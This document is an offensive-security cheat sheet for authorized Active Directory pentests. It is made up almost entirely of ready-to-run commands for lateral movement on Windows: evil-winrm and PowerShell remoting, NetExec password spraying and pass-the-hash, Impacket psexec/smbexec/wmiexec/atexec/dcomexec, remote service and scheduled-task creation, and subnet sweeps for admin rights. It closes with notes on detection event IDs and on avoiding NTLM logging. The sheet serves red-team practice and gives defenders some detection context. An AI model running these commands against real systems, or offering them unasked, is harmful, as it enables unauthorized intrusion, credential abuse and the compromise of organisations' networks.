WINRM-PSEXEC
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Native Windows remote-execution primitives used for authorized lateral movement in AD pentests: WinRM (5985/5986), SMB-based service execution (PsExec-style), WMI, and remote scheduled tasks. This sheet covers the tooling and detection footprint of each.
WINRM - EVIL-WINRM#
evil-winrm -i <host> -u <user> -p <pass> # Password auth
evil-winrm -i <host> -u <user> -H <ntlm-hash> # Pass-the-hash
evil-winrm -i <host> -u <user> -k -r corp.lu # Kerberos auth
evil-winrm -i <host> -u <user> -p <pass> -s ./scripts
# Load PS scripts dir
# In-session: upload/download, load .ps1, menu commands
WINRM - NATIVE POWERSHELL#
Enter-PSSession -ComputerName <host> -Credential <cred>
Invoke-Command -ComputerName <host> -ScriptBlock { whoami }
New-PSSession -ComputerName <host> -Credential $c
# Enable WinRM on a target (if you have local admin):
winrm quickconfig
Enable-PSRemoting -Force
WINRM - NETEXEC#
nxc winrm <host> -u <user> -p <pass> # Validate access nxc winrm <host> -u <user> -H <hash> # PtH check nxc winrm <host> -u <user> -p <pass> -x whoami # Execute command nxc winrm <host> -u users.txt -p pass.txt # Spray
PSEXEC-STYLE (IMPACKET)#
impacket-psexec corp.lu/user:pass@<host> # SYSTEM shell (noisy) impacket-psexec -hashes :<nthash> user@<host> # Pass-the-hash impacket-smbexec corp.lu/user:pass@<host> # Semi-interactive, no binary drop impacket-atexec corp.lu/user:pass@<host> whoami# Scheduled-task exec impacket-wmiexec corp.lu/user:pass@<host> # WMI exec (fileless-ish) impacket-dcomexec corp.lu/user:pass@<host> # DCOM exec
NETEXEC EXEC METHODS#
nxc smb <host> -u u -p p -x whoami # Default (wmiexec) nxc smb <host> -u u -p p -x whoami --exec-method smbexec nxc smb <host> -u u -p p -X '$PSVersionTable' # PowerShell command nxc smb <host> -u u -H <hash> -x hostname # PtH command exec
WMI / SC / SCHTASKS (NATIVE)#
# From a Windows foothold with creds: wmic /node:<host> /user:<u> /password:<p> process call create "cmd /c ..." sc \\<host> create svc binPath= "cmd /c ..." && sc \\<host> start svc schtasks /create /s <host> /u <u> /p <p> /tn t /tr "cmd /c ..." /sc once /st 00:00 schtasks /run /s <host> /tn t
PASS-THE-HASH / OVERPASS#
# NTLM hash reuse across the environment: nxc smb <subnet> -u <user> -H <nthash> # Spot where hash is admin impacket-psexec -hashes :<nthash> user@<host> # Use it # Overpass-the-hash (hash -> Kerberos TGT), then PsExec with -k
EXAMPLES#
# Confirm admin, then get an interactive shell (least noisy first) nxc smb 10.0.0.5 -u admin -H <hash> # (Pwn3d! = local admin) impacket-wmiexec -hashes :<hash> admin@10.0.0.5 # Sweep where a captured hash grants local admin nxc smb 10.0.0.0/24 -u user -H <nthash> | grep Pwn3d # Kerberos-only lateral move (no NTLM on the wire) evil-winrm -i host.corp.lu -u user -k -r corp.lu # Command exec via WinRM without a shell nxc winrm 10.0.0.5 -u admin -p 'Pass' -x "ipconfig /all"
NOTES#
- Noise ranking (loudest first): psexec > smbexec > atexec > wmiexec/dcomexec; WinRM is often the cleanest - psexec drops a service binary + creates a service = Event ID 7045 - wmiexec triggers 4688/WMI activity; atexec = 4698 (task created) - WinRM logs 4624 type 3 + WSMan operational events - Prefer Kerberos (-k) to avoid NTLM authentication events - Always operate under signed authorization; capture timestamps for the engagement report and blue-team replay - Detection queries live in DEFENDER-KQL.txt / DETECTION-ENGINEERING.txt